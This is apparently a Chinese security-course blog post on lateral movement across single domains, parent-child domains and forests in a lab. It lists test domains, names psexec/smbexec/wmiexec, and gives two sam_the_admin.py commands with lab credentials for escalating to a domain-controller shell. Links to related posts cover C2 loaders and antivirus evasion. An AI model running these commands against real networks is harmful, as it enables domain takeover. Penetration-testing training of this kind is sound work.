EthanDoctor

内网对抗-横向移动篇&单域&父子域&域林&域森林&打点及信任&入口手法差异&思路方案

Ethan医生5个月前系统安全163

 横向移动-信息收集-单域&父子域&域森林

 横向移动-口令协议-单域&父子域&域森林

 横向移动-域控提权-单域&父子域&域森林

单域&父子域&域森林环境下:

1、多域信息收集差异

XDORG(xiaodi.org)

HRXRORG(hr.xiaodi.org)

HHRORG(h.hr.xiaodi.org)

GAXDORG(ga.xiaodi.org)

GGAORG(h.ga.xiaodi.org)

XIAODI8(xiaodi8.org)

 

2、口令协议横向移动差异(只要口令是对的 同网段所有的域机器都可以登入)

psexec smbexec wmiexec等

 

3、域控提权横向移动差异

python sam_the_admin.py hhrorg/'hhrpc:admin!@#45' -dc-ip 192.168.139.35 -shell

python sam_the_admin.py xdorg/'test:admin!@#45' -dc-ip 192.168.139.11 -shell

 

4、入口跳板机与打点及横向移动思路相呼应

场景1:入口机在h.hr.xiaodi.org下

场景2:入口机在hr.xiaodi.org下

场景2:入口机在xiaodi8.org下


标签: 横向移动篇
返回列表

上一篇:内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

下一篇:内网对抗-横向移动篇&工作组局域网&中间人攻击&ARP欺骗&DNS劫持&单双向&断网截获

相关文章

免杀对抗-C2远控篇&C&C++&InlineHook挂钩&动态API调用&突破内存加密&导入表检测

➢ C2远控-Loader加载器-动态API➢ C2远控-Loader加载器-InlineHook➢ C2远控-DF-动态调用&InlineHook&混淆...

免杀对抗-C2远控篇&PowerShell&有无文件落地&C#参数调用&绕AMSI&ETW&去混淆特征

#C2远控-ShellCode-认知&环境1.创建工程时关闭SDL检查2.属性->C/C++->代码生成->运行库->多线程 (/MT)如果是debug则设置成MTD3...

Windows系统权限提升篇&计算机用户&进程注入&令牌窃取&服务启动&远程管理

应用场景:1、常规某个机器被钓鱼后门攻击后,我们需要做更高权限操作或权限维持等。2、内网域中某个机器被钓鱼后门攻击后,我们需要对后续内网域做安全测试。 主要当前技术入口点:-当前权限由钓鱼攻...

内网对抗-横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件

➢ 横向移动-域内域外-枚举用户&切换用户➢ 横向移动-IPC管道-命令连接&计划任务➢ 横向移动-IPC管道-Impacket工具套件#横向移动入口知识...

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决解决:信息收集打点和漏洞利用部分注意:配置连接IP为C2服务器IP工具:Proxifier Proxychains等Proxifier使用:直接看课程演...

免杀对抗-C2远控篇&Nim&ZigLang&冷门语言&Loader加载器&对抗优势&减少熵值特征

免杀对抗-C2远控篇&Nim&ZigLang&冷门语言&Loader加载器&对抗优势&减少熵值特征

➢ C2远控-其他语言-Nim&Zig-基础环境搭建➢ C2远控-其他语言-Nim&Zig-Loader加载器3、Nim开发环境搭建https://nim-lang...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号